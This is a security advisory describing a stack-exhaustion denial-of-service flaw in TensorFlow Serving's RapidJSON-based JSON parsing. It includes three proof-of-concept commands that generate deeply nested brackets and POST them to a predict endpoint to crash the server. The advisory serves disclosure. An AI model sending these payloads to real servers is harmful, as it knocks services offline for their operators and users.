This vulnerability allows unauthenticated remote attackers to cause the server to stop responding to requests due to a stack exhaustion when parsing malformed JSON input
(, 2.17.0]
TensorFlow Serving uses RapidJSON to process JSON input. The function ParseJson in json-tensor.cc uses RapidJSON’s ParseStream function to parse the JSON input. The default behavior of RapidJSON’s parsing function is [to parse the input recursively](https://rapidjson.org/md_doc_features.html#Parsing:~:text=Parsing-,Recursive (default),-and iterative parser) with no limit on the recursion depth. A malicious JSON string with an array or object that are deeply nested in each other can cause the server to crash.
Run TensorFlow Serving using the instructions in the page: https://www.tensorflow.org/tfx/serving/docker.
Then, run any of the following commands in a shell -
-
python -c 'print("{\"instances\": [1.0, 2.0, 5.0],\"signature_name\":" + "[" * 500000 + "]" * 500000 + "}")' > /tmp/malicious.txt curl -v -d @/tmp/malicious.txt -X POST http://localhost:8501/v1/models/half_plus_two:predict
-
python -c 'print("{\"instances\": [1.0, 2.0, 5.0],\"signature_name\":" + "[" * 50000 + "]" * 50000 + "}")' > /tmp/malicious.txt curl -v -d @/tmp/malicious.txt -X POST http://localhost:8501/v1/models/half_plus_two:predict
-
python -c 'print("{\"instances\":" + "[" * 50000 + "1" + "]" * 50000 + "}")' > /tmp/malicious.txt curl -v -d @/tmp/malicious.txt -X POST http://localhost:8501/v1/models/half_plus_two:predict
The server will crash.
No mitigations are supplied for this issue